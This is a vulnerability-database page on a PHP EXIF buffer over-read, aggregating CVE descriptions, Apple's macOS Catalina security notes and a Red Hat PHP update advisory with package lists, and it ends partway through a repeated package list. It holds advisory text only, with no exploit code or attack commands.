VARIoT IoT vulnerabilities database

When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash. PHP EXIF Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by PHPGroup and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. Attackers can exploit this vulnerability to cause buffer overflow or heap overflow, etc. Successfully exploiting this issue allow malicious users to execute arbitrary code in the context of the affected application. Failed exploits will result in denial-of-service conditions. PHP versions before 7.3.8 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-10-29-10 Additional information for APPLE-SA-2019-10-07-1 macOS Catalina 10.15 macOS Catalina 10.15 addresses the following: AMD Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8748: Lilang Wu and Moony Li of TrendMicro Mobile Security Research Team apache_mod_php Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Multiple issues in PHP Description: Multiple issues were addressed by updating to PHP version 7.3.8. CVE-2019-11041 CVE-2019-11042 Audio Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted audio file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8706: Yu Zhou of Ant-financial Light-Year Security Lab Entry added October 29, 2019 Books Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Parsing a maliciously crafted iBooks file may lead to a persistent denial-of-service Description: A resource exhaustion issue was addressed with improved input validation. CVE-2019-8774: Gertjan Franken imec-DistriNet of KU Leuven Entry added October 29, 2019 CFNetwork Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing maliciously crafted web content may lead to a cross site scripting attack Description: This issue was addressed with improved checks. CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland Entry added October 29, 2019 CoreAudio Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted movie may result in the disclosure of process memory Description: A memory corruption issue was addressed with improved validation. CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative CoreCrypto Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a large input may lead to a denial of service Description: A denial of service issue was addressed with improved input validation. CVE-2019-8741: Nicky Mouha of NIST Entry added October 29, 2019 CoreMedia Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8825: Found by GWP-ASan in Google Chrome Entry added October 29, 2019 Crash Reporter Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: The "Share Mac Analytics" setting may not be disabled when a user deselects the switch to share analytics Description: A race condition existed when reading and writing user preferences. This was addressed with improved state handling. CVE-2019-8757: William Cerniuk of Core Development, LLC CUPS Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An input validation issue was addressed with improved input validation. CVE-2019-8736: Pawel Gocyla of ING Tech Poland (ingtechpoland.com) Entry added October 29, 2019 CUPS Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted string may lead to heap corruption Description: A memory consumption issue was addressed with improved memory handling. CVE-2019-8767: Stephen Zeisberg Entry added October 29, 2019 CUPS Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved validation. CVE-2019-8737: Pawel Gocyla of ING Tech Poland (ingtechpoland.com) Entry added October 29, 2019 File Quarantine Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A malicious application may be able to elevate privileges Description: This issue was addressed by removing the vulnerable code. CVE-2019-8509: CodeColorist of Ant-Financial LightYear Labs Entry added October 29, 2019 Foundation Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project Zero Entry added October 29, 2019 Graphics Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a malicious shader may result in unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2018-12152: Piotr Bania of Cisco Talos CVE-2018-12153: Piotr Bania of Cisco Talos CVE-2018-12154: Piotr Bania of Cisco Talos Entry added October 29, 2019 Intel Graphics Driver Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8758: Lilang Wu and Moony Li of Trend Micro IOGraphics Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved restrictions. CVE-2019-8755: Lilang Wu and Moony Li of Trend Micro IOGraphics Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-8759: another of 360 Nirvan Team Entry added October 29, 2019 Kernel Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A local app may be able to read a persistent account identifier Description: A validation issue was addressed with improved logic. CVE-2019-8809: Apple Entry added October 29, 2019 Kernel Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2019-8709: derrek (@derrekr6) [confirmed]derrek (@derrekr6) CVE-2019-8781: Linus Henze (pinauten.de) Entry added October 29, 2019 Kernel Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8717: Jann Horn of Google Project Zero Kernel Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A malicious application may be able to determine kernel memory layout Description: A memory corruption issue existed in the handling of IPv6 packets. This issue was addressed with improved memory management. CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team Entry added October 29, 2019 libxml2 Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Multiple issues in libxml2 Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8749: found by OSS-Fuzz CVE-2019-8756: found by OSS-Fuzz Entry added October 29, 2019 libxslt Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Multiple issues in libxslt Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2019-8750: found by OSS-Fuzz Entry added October 29, 2019 mDNSResponder Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An attacker in physical proximity may be able to passively observe device names in AWDL communications Description: This issue was resolved by replacing device names with a random identifier. CVE-2019-8799: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt Entry added October 29, 2019 Menus Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8826: Found by GWP-ASan in Google Chrome Entry added October 29, 2019 Notes Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A local user may be able to view a user's locked notes Description: The contents of locked notes sometimes appeared in search results. This issue was addressed with improved data cleanup. CVE-2019-8730: Jamie Blumberg (@jamie_blumberg) of Virginia Polytechnic Institute and State University PDFKit Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An attacker may be able to exfiltrate the contents of an encrypted PDF Description: An issue existed in the handling of links in encrypted PDFs. This issue was addressed by adding a confirmation prompt. CVE-2019-8772: Jens Müller of Ruhr University Bochum, Fabian Ising of FH Münster University of Applied Sciences, Vladislav Mladenov of Ruhr University Bochum, Christian Mainka of Ruhr University Bochum, Sebastian Schinzel of FH Münster University of Applied Sciences, and Jörg Schwenk of Ruhr University Bochum PluginKit Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A local user may be able to check for the existence of arbitrary files Description: A logic issue was addressed with improved restrictions. CVE-2019-8708: an anonymous researcher Entry added October 29, 2019 PluginKit Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8715: an anonymous researcher Entry added October 29, 2019 SharedFileList Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A malicious application may be able to access recent documents Description: The issue was addressed with improved permissions logic. CVE-2019-8770: Stanislav Zinukhov of Parallels International GmbH sips Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8701: Simon Huang(@HuangShaomang), Rong Fan(@fanrong1992) and pjf of IceSword Lab of Qihoo 360 UIFoundation Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Parsing a maliciously crafted text file may lead to disclosure of user information Description: This issue was addressed with improved checks. CVE-2019-8761: Renee Trisberg of SpectX Entry added October 29, 2019 UIFoundation Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative WebKit Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: A user may be unable to delete browsing history items Description: "Clear History and Website Data" did not clear the history. The issue was addressed with improved data deletion. CVE-2019-8768: Hugo S. Diaz (coldpointblue) WebKit Available for: MacBook (Early 2015 and later), MacBook Air (Mid 2012 and later), MacBook Pro (Mid 2012 and later), Mac mini (Late 2012 and later), iMac (Late 2012 and later), iMac Pro (all models), Mac Pro (Late 2013 and later) Impact: Visiting a maliciously crafted website may reveal browsing history Description: An issue existed in the drawing of web page elements. The issue was addressed with improved logic. CVE-2019-8769: Piérre Reimertz (@reimertz) Additional recognition AppleRTC We would like to acknowledge Vitaly Cheptsov for their assistance. Audio We would like to acknowledge riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative for their assistance. boringssl We would like to acknowledge Nimrod Aviram of Tel Aviv University, Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr University Bochum and Thijs Alkemade (@xnyhps) of Computest for their assistance. Finder We would like to acknowledge Csaba Fitzl (@theevilbit) for their assistance. Gatekeeper We would like to acknowledge Csaba Fitzl (@theevilbit) for their assistance. Identity Service We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. mDNSResponder We would like to acknowledge Gregor Lang of e.solutions GmbH for their assistance. python We would like to acknowledge an anonymous researcher for their assistance. Safari Data Importing We would like to acknowledge Kent Zoya for their assistance. Simple certificate enrollment protocol (SCEP) We would like to acknowledge an anonymous researcher for their assistance. Telephony We would like to acknowledge Phil Stokes from SentinelOne for their assistance. VPN We would like to acknowledge Royce Gawron of Second Son Consulting, Inc. for their assistance. Installation note: macOS Catalina 10.15 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24s4QACgkQBz4uGe3y 0M0s3w//QZG0JsE1BjWJ3mwKoSn/I1V0SLryV9UxJeibPfhyF6VJEYk63jZxZ5ki 48vM7iKE3nAHamNFOMtUvyzEdO6VGNZ1uiuSu9nkyziEERapHJSLcEh83p2JhWV/ SEsBB3bsT4l3V9ZYxk/9DX6ynCTzKLZTynw6Yo2PMYiMpavD5sfZ6v8U53qdZ+LX SNuw+vRTsvu3YlFkUStTdQ64sT72yGII0c8iFpSb2AWv7IgbypB5lW4/MRQjrzoc 9yMhvMgXcgAlzoH5GpGE2EflbekcQxudxDh1t0o7f8OASRPTljNjL4oiKXBMhiAM iUgDn7duE9LqupfSWK5WOUkF+XRV0qTaLCTDWaCzVa5YsApvSVPhbmoFqKXSQG8T U6SxQviqzJ06sD1jqm2sZ/LnD5xMEXhQvNx89oJrTRsCU/o0fy4tRhHp52aJoF7E Wvr1kTlo6SGm6NjkmZVoKj6962/0XUYSOt8gR+L/sF7N6URUG+1Ko2jx8zhYHMEO ju+Hw0TFHd+8mP29oOEIsIpuRpCp9jjgEJDdu7mGqJ1Py2Gs0uGeHEZd6DJhKggA IvdJu4Q9usjWaxQ9H3m2I/xEqw78sMEEFgCYfLTC0gf2ChaiGZuhKipcF04c81kM bOGmjuyJrajD/2rY9EHrqtCm5b2079YAIxUAmTOkT0uP2WmlZoM= =bhin -----END PGP SIGNATURE----- . For the stable distribution (buster), these problems have been fixed in version 7.3.9-1~deb10u1. We recommend that you upgrade your php7.3 packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Critical: rh-php72-php security update Advisory ID: RHSA-2019:3299-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2019:3299 Issue date: 2019-11-01 CVE Names: CVE-2016-10166 CVE-2018-20783 CVE-2019-6977 CVE-2019-9020 CVE-2019-9021 CVE-2019-9022 CVE-2019-9023 CVE-2019-9024 CVE-2019-9637 CVE-2019-9638 CVE-2019-9639 CVE-2019-9640 CVE-2019-11034 CVE-2019-11035 CVE-2019-11036 CVE-2019-11038 CVE-2019-11039 CVE-2019-11040 CVE-2019-11041 CVE-2019-11042 CVE-2019-11043 ===================================================================== 1. Summary: An update for rh-php72-php is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64le, s390x, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.5) - ppc64le, s390x, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.6) - ppc64le, s390x, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.7) - ppc64le, s390x, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. Description: PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The following packages have been upgraded to a later upstream version: rh-php72-php (7.2.24). (BZ#1766603) Security Fix(es): * php: underflow in env_path_info in fpm_main.c (CVE-2019-11043) * gd: Unsigned integer underflow _gdContributionsAlloc() (CVE-2016-10166) * gd: Heap based buffer overflow in gdImageColorMatch() in gd_color_match.c (CVE-2019-6977) * php: Invalid memory access in function xmlrpc_decode() (CVE-2019-9020) * php: File rename across filesystems may allow unwanted access during processing (CVE-2019-9637) * php: Uninitialized read in exif_process_IFD_in_MAKERNOTE (CVE-2019-9638) * php: Uninitialized read in exif_process_IFD_in_MAKERNOTE (CVE-2019-9639) * php: Invalid read in exif_process_SOFn() (CVE-2019-9640) * php: Out-of-bounds read due to integer overflow in iconv_mime_decode_headers() (CVE-2019-11039) * php: Buffer over-read in exif_read_data() (CVE-2019-11040) * php: Buffer over-read in PHAR reading functions (CVE-2018-20783) * php: Heap-based buffer over-read in PHAR reading functions (CVE-2019-9021) * php: memcpy with negative length via crafted DNS response (CVE-2019-9022) * php: Heap-based buffer over-read in mbstring regular expression functions (CVE-2019-9023) * php: Out-of-bounds read in base64_decode_xmlrpc in ext/xmlrpc/libxmlrpc/base64.c (CVE-2019-9024) * php: Heap buffer overflow in function exif_process_IFD_TAG() (CVE-2019-11034) * php: Heap buffer overflow in function exif_iif_add_value() (CVE-2019-11035) * php: Buffer over-read in exif_process_IFD_TAG() leading to information disclosure (CVE-2019-11036) * gd: Information disclosure in gdImageCreateFromXbm() (CVE-2019-11038) * php: heap buffer over-read in exif_scan_thumbnail() (CVE-2019-11041) * php: heap buffer over-read in exif_process_user_comment() (CVE-2019-11042) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the updated packages, the httpd daemon must be restarted for the update to take effect. 5. Bugs fixed (https://bugzilla.redhat.com/): 1418983 - CVE-2016-10166 gd: Unsigned integer underflow _gdContributionsAlloc() 1672207 - CVE-2019-6977 gd: Heap based buffer overflow in gdImageColorMatch() in gd_color_match.c 1680545 - CVE-2018-20783 php: Buffer over-read in PHAR reading functions 1685123 - CVE-2019-9020 php: Invalid memory access in function xmlrpc_decode() 1685132 - CVE-2019-9021 php: Heap-based buffer over-read in PHAR reading functions 1685398 - CVE-2019-9023 php: Heap-based buffer over-read in mbstring regular expression functions 1685404 - CVE-2019-9024 php: Out-of-bounds read in base64_decode_xmlrpc in ext/xmlrpc/libxmlrpc/base64.c 1685412 - CVE-2019-9022 php: memcpy with negative length via crafted DNS response 1688897 - CVE-2019-9637 php: File rename across filesystems may allow unwanted access during processing 1688922 - CVE-2019-9638 php: Uninitialized read in exif_process_IFD_in_MAKERNOTE 1688934 - CVE-2019-9639 php: Uninitialized read in exif_process_IFD_in_MAKERNOTE 1688939 - CVE-2019-9640 php: Invalid read in exif_process_SOFn() 1702246 - CVE-2019-11035 php: Heap buffer overflow in function exif_iif_add_value() 1702256 - CVE-2019-11034 php: Heap buffer overflow in function exif_process_IFD_TAG() 1707299 - CVE-2019-11036 php: Buffer over-read in exif_process_IFD_TAG() leading to information disclosure 1724149 - CVE-2019-11038 gd: Information disclosure in gdImageCreateFromXbm() 1724152 - CVE-2019-11039 php: Out-of-bounds read due to integer overflow in iconv_mime_decode_headers() 1724154 - CVE-2019-11040 php: Buffer over-read in exif_read_data() 1739459 - CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail() 1739465 - CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment() 1766378 - CVE-2019-11043 php: underflow in env_path_info in fpm_main.c 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: rh-php72-php-7.2.24-1.el7.src.rpm aarch64: rh-php72-php-7.2.24-1.el7.aarch64.rpm rh-php72-php-bcmath-7.2.24-1.el7.aarch64.rpm rh-php72-php-cli-7.2.24-1.el7.aarch64.rpm rh-php72-php-common-7.2.24-1.el7.aarch64.rpm rh-php72-php-dba-7.2.24-1.el7.aarch64.rpm rh-php72-php-dbg-7.2.24-1.el7.aarch64.rpm rh-php72-php-debuginfo-7.2.24-1.el7.aarch64.rpm rh-php72-php-devel-7.2.24-1.el7.aarch64.rpm rh-php72-php-embedded-7.2.24-1.el7.aarch64.rpm rh-php72-php-enchant-7.2.24-1.el7.aarch64.rpm rh-php72-php-fpm-7.2.24-1.el7.aarch64.rpm rh-php72-php-gd-7.2.24-1.el7.aarch64.rpm rh-php72-php-gmp-7.2.24-1.el7.aarch64.rpm rh-php72-php-intl-7.2.24-1.el7.aarch64.rpm rh-php72-php-json-7.2.24-1.el7.aarch64.rpm rh-php72-php-ldap-7.2.24-1.el7.aarch64.rpm rh-php72-php-mbstring-7.2.24-1.el7.aarch64.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.aarch64.rpm rh-php72-php-odbc-7.2.24-1.el7.aarch64.rpm rh-php72-php-opcache-7.2.24-1.el7.aarch64.rpm rh-php72-php-pdo-7.2.24-1.el7.aarch64.rpm rh-php72-php-pgsql-7.2.24-1.el7.aarch64.rpm rh-php72-php-process-7.2.24-1.el7.aarch64.rpm rh-php72-php-pspell-7.2.24-1.el7.aarch64.rpm rh-php72-php-recode-7.2.24-1.el7.aarch64.rpm rh-php72-php-snmp-7.2.24-1.el7.aarch64.rpm rh-php72-php-soap-7.2.24-1.el7.aarch64.rpm rh-php72-php-xml-7.2.24-1.el7.aarch64.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.aarch64.rpm rh-php72-php-zip-7.2.24-1.el7.aarch64.rpm ppc64le: rh-php72-php-7.2.24-1.el7.ppc64le.rpm rh-php72-php-bcmath-7.2.24-1.el7.ppc64le.rpm rh-php72-php-cli-7.2.24-1.el7.ppc64le.rpm rh-php72-php-common-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dba-7.2.24-1.el7.ppc64le.rpm rh-php72-php-dbg-7.2.24-1.el7.ppc64le.rpm rh-php72-php-debuginfo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-devel-7.2.24-1.el7.ppc64le.rpm rh-php72-php-embedded-7.2.24-1.el7.ppc64le.rpm rh-php72-php-enchant-7.2.24-1.el7.ppc64le.rpm rh-php72-php-fpm-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-gmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-intl-7.2.24-1.el7.ppc64le.rpm rh-php72-php-json-7.2.24-1.el7.ppc64le.rpm rh-php72-php-ldap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mbstring-7.2.24-1.el7.ppc64le.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.ppc64le.rpm rh-php72-php-odbc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-opcache-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pdo-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pgsql-7.2.24-1.el7.ppc64le.rpm rh-php72-php-process-7.2.24-1.el7.ppc64le.rpm rh-php72-php-pspell-7.2.24-1.el7.ppc64le.rpm rh-php72-php-recode-7.2.24-1.el7.ppc64le.rpm rh-php72-php-snmp-7.2.24-1.el7.ppc64le.rpm rh-php72-php-soap-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xml-7.2.24-1.el7.ppc64le.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.ppc64le.rpm rh-php72-php-zip-7.2.24-1.el7.ppc64le.rpm s390x: rh-php72-php-7.2.24-1.el7.s390x.rpm rh-php72-php-bcmath-7.2.24-1.el7.s390x.rpm rh-php72-php-cli-7.2.24-1.el7.s390x.rpm rh-php72-php-common-7.2.24-1.el7.s390x.rpm rh-php72-php-dba-7.2.24-1.el7.s390x.rpm rh-php72-php-dbg-7.2.24-1.el7.s390x.rpm rh-php72-php-debuginfo-7.2.24-1.el7.s390x.rpm rh-php72-php-devel-7.2.24-1.el7.s390x.rpm rh-php72-php-embedded-7.2.24-1.el7.s390x.rpm rh-php72-php-enchant-7.2.24-1.el7.s390x.rpm rh-php72-php-fpm-7.2.24-1.el7.s390x.rpm rh-php72-php-gd-7.2.24-1.el7.s390x.rpm rh-php72-php-gmp-7.2.24-1.el7.s390x.rpm rh-php72-php-intl-7.2.24-1.el7.s390x.rpm rh-php72-php-json-7.2.24-1.el7.s390x.rpm rh-php72-php-ldap-7.2.24-1.el7.s390x.rpm rh-php72-php-mbstring-7.2.24-1.el7.s390x.rpm rh-php72-php-mysqlnd-7.2.24-1.el7.s390x.rpm rh-php72-php-odbc-7.2.24-1.el7.s390x.rpm rh-php72-php-opcache-7.2.24-1.el7.s390x.rpm rh-php72-php-pdo-7.2.24-1.el7.s390x.rpm rh-php72-php-pgsql-7.2.24-1.el7.s390x.rpm rh-php72-php-process-7.2.24-1.el7.s390x.rpm rh-php72-php-pspell-7.2.24-1.el7.s390x.rpm rh-php72-php-recode-7.2.24-1.el7.s390x.rpm rh-php72-php-snmp-7.2.24-1.el7.s390x.rpm rh-php72-php-soap-7.2.24-1.el7.s390x.rpm rh-php72-php-xml-7.2.24-1.el7.s390x.rpm rh-php72-php-xmlrpc-7.2.24-1.el7.s390x.rpm rh-php72-php-zip-7.2.24-1.el7.s390x.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: rh-php72-php-7.2.24-1.el7.src.rpm aarch64: 